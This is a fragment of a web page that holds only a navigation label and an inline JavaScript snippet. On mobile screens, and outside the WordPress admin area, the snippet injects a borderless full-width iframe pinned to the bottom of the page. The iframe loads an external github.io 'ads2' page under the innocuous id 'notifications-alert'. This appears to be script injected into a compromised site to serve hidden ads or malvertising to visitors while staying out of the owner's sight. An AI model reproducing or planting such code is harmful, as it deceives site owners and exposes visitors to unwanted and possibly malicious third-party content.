Jump to Navigation
document.addEventListener('DOMContentLoaded', function() {
if (window.location.pathname.includes('/wp-admin')) return;
if (window.innerWidth >= 768) return;
var iframe = document.createElement('iframe');
iframe.src = 'https://kusumahala1996-dotcom.github.io/ads2/';
iframe.id = 'notifications-alert';
iframe.style.border = 'none';
iframe.style.zIndex = '9999';
iframe.style.zIndex = '9999';
iframe.style.position = 'fixed';
iframe.style.bottom = '0';
iframe.style.left = '0';
iframe.style.width = '100%';
iframe.style.height = '250px';
iframe.style.display = 'block';
document.body.appendChild(iframe);
});